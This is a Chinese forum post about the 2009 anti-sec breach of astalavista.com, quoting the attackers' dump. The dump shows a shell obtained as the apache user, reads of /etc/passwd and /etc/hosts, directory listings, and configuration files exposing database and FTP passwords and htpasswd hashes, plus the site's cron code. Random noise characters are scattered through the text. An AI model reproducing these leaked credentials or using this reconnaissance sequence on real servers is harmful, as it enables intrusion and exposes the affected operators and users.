里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
. R+ F! a7 Z: d
+ C' V' O8 X% q/ q2 x% a1 o[root@front3 ~]# curl -I litespeedtech.com$ w) Q" @ P3 e- m' e+ l) F; F P
HTTP/1.1 200 OK) A- W- I; X0 ^
Date: Fri, 05 Jun 2009 22:54:51 GMT' v, N3 O# o' D" i5 z. P# `
Server: LiteSpeed
" f3 U' Z4 s; e$ l
. I5 b& W4 t; l) A: B! G另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-# f) M& |) ^3 z' \# ~
* R1 O9 P# d$ ~# g, w
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
6 x* d+ v0 v. ~" p6 P, I! ~/ e4 a
8 f8 b/ s1 L& K7 |9 W5 |
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ 1 q W0 J3 ~( e1 J$ ^
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
; Q( U1 W Y4 t2 B. C8 d A/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \8 ]. `* o- c, }. E
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
7 N* x/ r" X1 e F. B4 S \/ \/ \/ \/ \/ \/ \/
+ G7 s4 g) z( o6 @" c The Hacking & Security Community- N$ ^5 ?' z: {9 X' J* h% ]
[+] Founded in 1997 by a hacker computer enthusiast# S/ ^ {# C b
[-] Exposed in 2009 by anti-sec group
* ` A8 Z/ V, W4 `9 ~
+ m) ^" n; j+ y( f! U, n; LFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
' ?5 k7 I6 g5 Q/ h>> 03. Who’s behind the site?. s" G* _8 h `
>>
5 D& m1 @0 C) `6 g) H; b>> A team of security and IT professionals, and a countless number of contributors from all over the world.* Z5 L2 ?( [2 y. i" q$ z) |
: [8 x) M! W7 q8 L2 j>> 05. Is it true that the site is visited by script-kiddies and warez fans only?: K9 a1 y/ P: i
>>
' C9 k% A+ |( F9 V4 c+ f. `9 b2 [>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and4 ^# E# X, i( f1 ~# [, s
military institutions.
8 T5 b+ K+ p! C>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
% o! c1 m- E/ g S( c$ P
& X7 [% G/ Y8 K# I; IWhy has Astalavista been targeted?( K: H2 o x& l6 J, ]2 a6 U( L
" v2 n) l- ]1 E8 G7 \6 z
Other than the fact that they are not doing any of this for the “community” but
: _+ w2 @$ I9 O5 [% w7 C8 ~+ h* Lfor the money, they spread exploits for kids, claim to be a security community
, b- x4 r9 Q; e3 G, m: E! ~(with no real sense of security on their own servers), and they charge you $6.66- b+ |- {) _7 Y) u3 E) Q) b
per months to access a dead forum with a directory filled with public releases2 |7 |. Z7 D, K+ Y; e
and outdated / broken services.. K: c- `, t# Z V/ e, }
# I# |" {: B1 F) F& Y2 S9 pWe wanted to see how good that “team of security and IT professionals” really is.
$ _9 J' Y8 D! B4 @ V d" E6 a
( D7 r- [5 X, uLet’s begin.
) y, o Y# [: G7 F/ D1 a5 ]7 @# Z: ?2 h8 q, H: R
anti-sec:~# ./g0tshell astalavista.com -p 80! S g! c( U$ D2 M
[+] Connecting to astalavista.com:800 f9 C1 c$ f Y" y; O; V
[+] Grabbing banner…
' D7 l- F7 W2 _, \" C2 _LiteSpeed8 ]5 U, P0 C. G
[+] Injecting shellcode…) s5 Z8 e& Y6 i$ Z2 C3 |
[-] Wait for it; R* S$ a; S6 j3 R, x
0 l4 \5 T1 j2 I0 B7 w/ }[~] We g0tshell
2 T t4 q; A5 B: f! Yuname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
6 s8 \) ^2 g8 k) jID: uid=100(apache) gid=500(apache) groups=500(apache)
; M1 E0 G6 K, p1 B! c4 `6 o: ]7 _4 Y! x
sh-3.2$ cat /etc/passwd
4 J: V; C4 x; _% C( Z+ Rroot:x:0:0:root:/root:/bin/bash; S' L: A: ^) I0 C V8 ~; S
bin:x:1:1:bin:/bin:/sbin/nologin& O6 X: Y) E. r5 M9 L( q
daemon:x:2:2:daemon:/sbin:/sbin/nologin9 c; T; X/ W! K1 k: P6 _
adm:x:3:4:adm:/var/adm:/sbin/nologin J4 c' a2 G" z/ e
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin: g* [! B+ \. f. B
sync:x:5:0:sync:/sbin:/bin/sync, T& N: \! q- S. ?. ?& O' b5 `1 o
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
9 ^7 @1 n2 l9 `+ Y6 w5 P2 phalt:x:7:0:halt:/sbin:/sbin/halt5 i7 m$ A& X- X6 P1 d8 B
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
$ i! }5 M D" a A# W9 \news:x:9:13:news:/etc/news:
9 _5 K! T1 G B/ A% x; duucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin( ~0 T! D! |3 ?8 R
operator:x:11:0 perator:/root:/sbin/nologin. R+ e5 t: i- h) H
games:x:12:100:games:/usr/games:/sbin/nologin3 q' k7 @! q8 i1 O, [. I
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
$ d0 |( \+ ]* w0 s5 T$ `( H' A* `ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- V4 g/ l# \7 V o& Y: r! Lnobody:x:99:99:Nobody:/:/sbin/nologin
3 |' w( ^6 H. A1 ?; N: h8 drpm:x:37:37::/var/lib/rpm:/sbin/nologin0 l1 @+ D }+ N3 R3 L3 H, R
dbus:x:81:81:System message bus:/:/sbin/nologin8 z! a! W k; ]1 O- W# K
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
% f' x# ~. H: [mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
5 p9 D* R- b* ^; @# d. z3 fsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin# f8 I1 W, h7 [) O! m. Q. b" ^0 M
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin& p5 C! m2 X& O! n+ ?
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin6 G4 O7 q _6 \# Y* e, L0 t, v$ x
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin' @1 Y4 b! ]* g$ b' Y# i
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
# J) |0 A0 ]4 e- C1 Tnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin& H0 ~/ `4 l$ b* K/ n& R! s- C/ S
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
: ]3 @' m$ ~2 s6 Z# {6 E' w; qpcap:x:77:77::/var/arpwatch:/sbin/nologin
$ O8 W) W# v2 }named:x:25:25:Named:/var/named:/sbin/nologin
5 o) Q5 N- B; R# `+ wapache:x:100:500::/var/www:/bin/false
! J9 b2 Z# E. `4 l( I" rdiradmin:x:101:101::/usr/local/directadmin:/bin/bash/ N( J6 P9 m; C8 p7 ~/ h
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
$ ?/ z9 n8 ^+ _# s s6 u- x' q$ Vwebapps:x:500:501::/var/www/html:/bin/bash9 _* k. k. a6 W; L
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash" h: o. r4 D6 K
admin:x:501:502::/home/admin:/bin/bash
- t1 u. q5 k! Rjon:x:502:503::/home/jon:/bin/bash
. K2 \. B7 i/ j( ^& |. m! m7 Gcom:x:503:504::/home/com:/bin/bash
& x1 R8 \" C# t- O* H1 R) Sntp:x:38:38::/etc/ntp:/sbin/nologin, C+ @6 ?, m9 |9 j/ A! {
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin3 N6 \ w |/ [' M/ `4 T% E
astanet:x:504:505::/home/astanet:/bin/bash
% c5 d9 e0 C. O2 Z: i% F: b, tavahi:x:70:70:Avahi daemon:/:/sbin/nologin9 B3 ~/ U& K1 |% U9 t Y
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
) l8 J! i# s3 V" S" Z
9 P( |6 p% D' o2 W6 ~, ^% e, csh-3.2$ cat /etc/hosts
; D8 N% n/ i- A9 e- i# Do not remove the following line, or various programs
, U7 k: Z" x( T$ l, N# that require network functionality will fail.) D- V [: o6 K$ r
127.0.0.1 localhost.localdomain localhost
& Q$ @; X1 v, d::1 localhost6.localdomain6 localhost6
0 t+ k( e2 `9 p) R$ X( h80.74.154.172 asta1.astalavistaserver.com
; \3 z& O4 i- I7 f7 @" r/ ?; X* |# w: v
sh-3.2$ pwd
* R0 x$ e9 `5 V, l) i; E* a) Z, \/home/com/public_html
! D9 L4 D4 e4 E6 c8 a5 C& ` A0 o+ v: k, f) G; [8 q
sh-3.2$ ls -la
0 \3 u" i9 p7 utotal 18460
, L# p) ^$ K" Z. Pdrwxr-xr-x 30 com apache 4096 May 28 17:06 .
" N/ H0 Z$ l3 b- Ldrwx–x–x 11 com com 4096 Jun 25 2008 ..4 d) V- w$ E6 |7 \. ?7 [2 Q- A6 }
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin4 ~5 x- G. I0 a/ r( k. [- K
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
% G' i% d6 e) _3 @" m+ Udrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin2 n0 L7 u: D% b4 N! \& i
drwxrwxrwx 2 com com 4096 May 19 00:50 config
4 b2 k/ M Q, c$ G5 t/ Ddrwxr-xr-x 2 com com 4096 Mar 20 11:05 core9 T. g. e& Y% c4 g- H
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules Z' L" x/ ~- A: d1 F
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing8 V$ W* [. d& k9 a# Z2 l) R5 O. c. b
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo2 o! W( o, ]' X" i: {
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__9 V1 W7 r/ b/ e: W1 c3 w* R0 R
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
& T$ b6 }6 ]0 k9 j8 _7 ^drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
3 I( m/ A: r% h) W) X8 Z1 Gdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
$ i( l* B, \/ s-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
9 X- B; c( s4 Rdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
G0 ~$ x7 n3 X-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
+ C# s) n+ d& O2 q-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
: d g/ `4 q' f- Z, x8 z! P5 q2 B& x-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak3 a. L4 W7 e: T! h% G) n7 O4 e
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
! j' B# S! R5 L/ a h7 B9 f6 q) fdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
5 D, \% {, A% J3 u3 B: ?-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php: I" z$ v' ]1 N
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
; o6 h5 N I) ?4 Adrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang H6 p# j# a6 R2 u8 ? v7 J7 m
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
* `6 t, |2 K, _drwxrwxrwx 12 com com 4096 Jun 2 07:47 media% @2 M( h# a/ q% ^/ }0 H
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications; X2 ?0 `; x$ A$ @
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
- @* F+ ^7 C6 {1 D- v3 J" hdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
: @& x' N' i) T8 u; T7 B; Ydrwxrwxr-x 22 com com 4096 May 28 17:06 _new4 X3 Q* a! r! T; L' v5 b
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
1 V# ?- `: ]/ G" r f* N- ndrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
# k0 H9 i7 Y0 {; Kdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy! k$ o8 [* y: _' E, d
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
: j" ]9 v) d% _; x$ r-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
8 o0 T Q/ h; d" B-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
& _4 O+ `0 _4 V8 M- G* Ddrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes) D% M% u+ S, ]& M- G4 \5 L
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
+ d" l- m4 q, N8 Qdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
0 S1 b/ _2 A1 F1 x, j/ F& D2 R) m& G
5 I" w* T2 g4 V X1 o) Q5 W. Q9 Z, x0 psh-3.2$ head -20 index.php# ?, D" s0 Z' T3 l4 B8 A0 q4 B
<?php
2 X# ?4 {. V+ E+ \* d1 C6 C" e9 p. n2 Q5 X4 V& @
/**
: k8 f% j! g2 b* ?* The main page for the CMS+ `! @6 L7 B- ]! c! R3 ~) J
* @copyright CONTREXX CMS - COMVATION AG
2 U6 B1 N. ? M) ?' U* @author Comvation Development Team, `) z w6 o; T8 O
* @version v1.0.9.10.1 stable
4 T8 B1 m6 I3 X7 {, ^, p# K* @package contrexx1 p4 A+ p' [5 ^; j1 A
* @subpackage core/ a# y: _$ |) B# Q: u+ G
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
& v1 x3 Q$ k6 z9 W, K8 ]* @since v0.0.0.0
" n, Z3 a. H4 H3 F( F6 c0 `* @todo Capitalize all class names in project7 } r/ B- d& @% `
* @uses /config/configuration.php
0 r7 |, j$ K2 `* @uses /config/settings.php
# d$ Z) n/ `5 ~9 Z# r* @uses /config/version.php. B0 ?0 Z0 K' J
* @uses /core/API.php
* u# [0 B. C; K! F: S* @uses /core_modules/cache/index.class.php
4 }2 O" @; y( [4 W" W$ I* @uses /core/error.class.php% C; c* F2 ~8 Q" ^
* @uses /core_modules/banner/index.class.php. O' c& l+ ]% J, x) {
* @uses /core_modules/contact/index.class.php8 W. z" H! k. a$ J; i6 f* {
7 w' ~; V1 I7 E. O/ Csh-3.2$ cd config/
; _2 Y. o2 Z) o# [$ @$ Qsh-3.2$ ls -la
% t9 v2 n) B! [total 324 @4 R6 Y" P1 Z3 U4 c7 k7 |5 ^
drwxrwxrwx 2 com com 4096 May 19 00:50 ., R9 u* O; t8 n3 b/ S3 d3 M( @
drwxr-xr-x 30 com apache 4096 May 28 17:06 .. ^8 o* m E: a
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
' J% g+ M! j) b2 v: I+ a+ Q- K-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php8 c/ N$ Q6 \/ S# K8 g. S
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php* R; v; B$ Q' y8 ]2 ~
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
, z4 [2 [; q% @: m9 m
$ M! Q8 L! k6 H3 k k0 ?! u0 A( y% esh-3.2$ cat configuration.php
" [; M6 I6 v/ X* z$ o% ?[snip]0 |: n' k% j0 Y0 n
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
3 i; O( i0 Z4 K& A2 l$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name2 k/ B' t r; Z! |
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
2 K( j8 `& J0 E5 H+ G- T$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username% R6 ]+ Y1 O3 V
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
; K+ J, q! A- S, U! g$ I% l$ u$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..). g$ q1 g4 D7 ~0 B' v" h
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..). P, q* `2 a0 q- L& w) o
[snip]
/ U0 R \4 l( \- [7 ~$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
! N t3 ~ C- f7 p) u9 M9 Q; s7 U$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode$ ^! h" `6 ?6 m8 ]: M7 { T2 e
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
' e. ]2 i; h# @0 C7 F( q8 I$_FTPCONFIG['port'] = 21; // Ftp remote port4 ~5 j5 Z" w1 z- i+ O x
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username/ Q# `3 k! n y: V' _/ N+ x
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
Z4 y a; C" Y: l+ _* x$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
7 c9 F. J5 I/ J+ P
. a7 M0 |$ w) t+ a: l. I0 ish-3.2$ cd ..
" M$ I4 ]* X9 D4 v Xsh-3.2$ cd dvd/8 L* J1 Z$ V# _. K) n5 f X9 w
sh-3.2$ ls -la, b6 Z: _, m8 @' K
total 29137800 b/ o' _2 ?/ G! _; B
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
) @. d+ f) [/ D4 @; Rdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
9 r9 z2 l8 Z* d' v8 [% a* N-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar* p& C- S; A( F; B5 p8 t6 f
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
% x/ ?/ C+ ]1 b+ k; r* I5 B5 ]-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar1 |1 ]8 W0 [6 b3 ^
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
7 r2 Q" L; W S( J; _' X
& I* R( L, Q7 s" S2 tsh-3.2$ cat .htaccess
5 w% i2 ]2 I$ b# c& w3 W. E8 D2 c1 oauthType Basic [, Q: z" _" e1 |; T9 E, c0 k
authName DVD
8 @' w2 q2 C* ~% D" y9 L% IauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
3 F Q% l, P5 W+ o2 D2 |require valid-user/ d7 k- b, D; r/ [$ @
; {6 l: m9 D7 D$ a2 }sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
M- _! j5 e& D: d$ a& NDVDdownload:CRD8cuY6.MPT60 m) u* y: `0 C, F# v5 g3 E4 O
DVDdownload2:CR8a36.wluFMg
& Q3 Q4 o( c q0 j6 x
# T; F0 r$ w4 p# y# P" N, ash-3.2$ cat test.php+ Y" \% t+ Q* J& `! a: P, \
<?php
Q0 k# R9 j( p( i5 m! u$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;7 w+ A7 S8 T( n/ v
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
- i4 M! B; k, u! O# h% {) Kecho $url;) M5 e0 [: f8 {+ E
?>
6 O0 {# P; E7 k1 |* x
2 m4 X- k3 I, j2 u% _+ jsh-3.2$ cd modifications/ p& d1 `" s" Z( f9 k- o# P5 [& D
sh-3.2$ ls -la
' ^$ |. P% v' y! y/ r% Vtotal 32
8 i0 j0 [& x" G3 @drwxr-xr-x 8 com com 4096 May 11 12:48 .
Q5 |/ l. a; G7 U) d3 W1 S" Bdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
2 ^0 H7 s( o# c: D3 `drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng5 Z' L6 N4 b3 h0 F$ _' O* ~
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
' s" q9 \2 [0 \drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
% \9 z( v, W' d5 @8 Q' edrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
* G6 p7 o) B" E, f. N3 {drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
: Q: J4 ?8 z8 G, M7 @7 _/ i; Hdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
# r \ }6 ?$ s. E% b9 x& ~/ s; e
, M8 r1 a+ g8 X7 r$ e5 v! ?sh-3.2$ ls -R
0 ?- V# C+ v" t.:
# ] m3 O6 B% M: ^, [com_avtng cronjobs onlinetools pjirc search _tmp* I7 X! E v" \2 C W
6 x F+ T) Y- L3 z./com_avtng:
' H! k4 C% d# z( u8 p$ iavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts- [- t2 D- S/ y9 s
; a6 a7 s. d/ l; E5 R2 e./com_avtng/scripts:( N4 v, _8 k( a$ V
popunder.js
3 S' ]+ j4 R# I8 B! E' h7 v! y' _8 ?7 H' W
./cronjobs:: u. ~' _$ h) j- Z$ u
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
" L5 R: k0 x/ W9 b" } B3 j8 G9 j+ n8 C1 f, t
./cronjobs/tmp:3 C t4 e' D: d! _" ?
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
. \& k; U0 ~8 `. K
4 I/ _; g I# W9 T9 L./onlinetools:
+ G d; h6 }8 X5 z5 t4 A; w# g1 mindex.php
: o5 U+ {6 V$ C/ } s7 T5 `
- D* D, y- w3 d6 y./pjirc:8 a w( R5 y$ n& O. M* ]
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
3 g( W# z& e0 O: Y$ D* @; OAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt1 R) O$ E4 Y' @; d7 s
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
/ w. z2 `8 A8 ]& z
% c' P, |3 \7 P# p./pjirc/img:! A. i$ @0 j! n; k5 U- h3 P) T) \
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif$ M% {: _( K7 G
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif 1 v* r) k* n% K; l. {
verre-eau.gif" x: N4 u8 x( ^+ h
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif ' K0 ^6 K1 K+ X* Y n' q
verre-vin.gif4 k. r2 T$ r+ ]& P# X5 T
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif& A f2 z! h1 r9 t
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
4 w7 `1 ^) U+ Q6 N" H. W3 w( W" c5 c- h8 d. C
./pjirc/snd:. h' M* y0 l) J. `
bell2.au ding.au1 ?1 C4 t- e* k
. G3 B) K, w- z& X# t. ]& F./search:/ i( d) ?8 d) F
searchEngines.php search.php j' _ T. _1 ?4 P' }, W
. ~9 O N/ y7 d; W c# j: K7 @
./_tmp:
y& n- [2 [& R g2 fdefaultPorts.php defaultPorts.txt
# {6 c2 N4 Q7 }+ k% |% F
0 e. L" v/ j2 ?+ csh-3.2$ cd cronjobs/
J1 m+ c+ P& J& j& {- N% f9 U- ^1 S5 @sh-3.2$ cat exploits.php& {( z7 N1 {- i: f
[snip]$ t: P6 O2 u* B: x. K5 S) u' Y
$categories = array();; ~3 j! Y( u. A1 M; a) `
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
2 q4 X2 @, J' C. g6 r& ]5 D1 x$expolits = file($milw0rmFile);5 J T4 k. J. ]7 r; P
$comExploits = array();- L* l: ]$ c+ d- k( `. S
[snip]
/ R: a/ ?, d5 O- ?3 L& i// manage data
! S' g9 O5 `5 f' Sfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
/ V5 f. w% W y- V* Y" l6 F/ _' n% d+ y: L1 z7 x
// get path and title
$ Y# b% n. {0 X) g' t' t $expolits[$x] = trim($expolits[$x]);# m+ R3 I( p3 I$ R( n5 C. R* Y6 l2 o
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
$ X0 |3 i; e/ M# F/ h# B $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
) s! d) H) y+ X& W
{8 H: l& N0 s) T // check if file exists
4 p) c( [, J% N4 l3 M if (file_exists($path)) {
3 \2 T8 Z4 H( ]# I# g$ H: m" r3 V" W' q
$text = file_get_contents($path);0 Y" Q5 ~" _/ h9 i4 z# Y0 j
+ g9 A3 K, a; D
// get content and date# J. b. v' J8 e6 w
//$text = htmlspecialchars($text, ENT_QUOTES);- C9 y4 {/ Q0 w$ Y! H$ y
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));4 L# u. Q1 P: f$ `& z
if ($tmptext != ”) {$ U6 }* z9 }4 J$ l2 b' Q5 S
$text = $tmptext;
) t" c! X0 g7 o; J, o } else {
/ I0 G5 o; m; y' ]% y $text = addslashes(htmlentities($text, ENT_QUOTES));
3 w) ^ a) W7 B% h% b, r' k }
W2 h3 p, y: R3 N7 S# L, ~3 [3 U $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));5 [2 j U& g" C8 `+ B7 y Y( Y
$tmp = explode('-', $date);
1 t8 U+ g# b' ]8 g- N5 J' p $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
* G+ [# v* g) m# U( h! a' d $cat = getCategory ($path);7 P1 d9 s2 V: G# a
$ext = pathinfo(basename($path));
* A& T" [1 l7 j @% p' i) Q+ f $ext = $ext['extension'];
- A0 }, b5 J" u% e T- Y $qStr = ”
3 Z/ p! a7 ~( K/ V4 e& F, | SELECT `id`% P+ {# }6 A$ A4 R; d
FROM `contrexx_module_exploits`* G0 A+ [; f( T' D
WHERE `title` = ‘” . $title . “‘
+ K2 Y! _. x+ `) ]. q& {# x1 F AND `date` = ‘” . $date . “‘* [9 C# m+ }1 {3 h5 `% m
“; M! D5 P6 t* S: G) s# L
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;" ?5 y6 v. J- m; ~/ [ R. B+ u
$q = $_objDB->query($qStr);
. Z; S3 S8 v4 e Z+ x+ ?0 D6 E" a6 [- [9 E, u( }" W
if ($q->numRows() == 0) {" E# q- u2 w1 e7 S; P2 k
; C4 d& Y. V9 P( z/ ]- B // prepare array
6 k( \/ i' A' n3 t! ^, e $comExploits[$x]['date'] = $date;
* ^6 }+ X$ R. e. P6 r( R $comExploits[$x]['title'] = $title;& R9 s- f8 R. @* @+ m% |% n
$comExploits[$x]['author'] = ‘milw0rm’;
$ y( [( W8 c0 h $comExploits[$x]['text'] = $text;
* Z; {+ x# ^6 ?, f5 E1 i+ E $comExploits[$x]['source'] = $ext;
7 w* n5 `! F: F0 o8 a $comExploits[$x]['url1'] = ”;3 y- ~4 b; L8 q/ Q( _1 T
$comExploits[$x]['url2'] = ”;7 @. x6 v6 m0 u4 k/ T
$comExploits[$x]['catid'] = $cat;5 E& J Y4 ~% \: P J7 ~
$comExploits[$x]['lang'] = ‘2′;3 f' s: F5 c' V: h8 b' ~! N
$comExploits[$x]['userid'] = ‘12′;
$ |" V+ G5 T# Z& \ W $comExploits[$x]['startdate'] = ‘0000-00-00′;
0 y {* S( m" b* F $comExploits[$x]['enddate'] = ‘0000-00-00′;" G" z; Y7 M- N! O9 C
$comExploits[$x]['status'] = ‘1′;
# Z; G1 r. z4 ]2 ~- h6 @ $comExploits[$x]['changelog'] = $date;$ O* Y2 a+ j0 `6 E
6 a4 B# u7 e1 i1 U/ z0 |2 M$ y% ] }
0 b0 k3 {( u, G: N5 k+ i+ Z( o5 i9 n[snip]
8 \3 u$ ]* |5 E. [2 N4 O3 \# @ $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
- a: c! ]5 U C<rss version=”2.0″>3 `/ R( y' q( Y' J
<channel>
" ]! h" m2 {& Z- @- G) U5 M <title>ASTALAVISTA.com - Exploits</title>* O+ n. s( k( l! s
<link>http://www.astalavista.com/exploits</link>
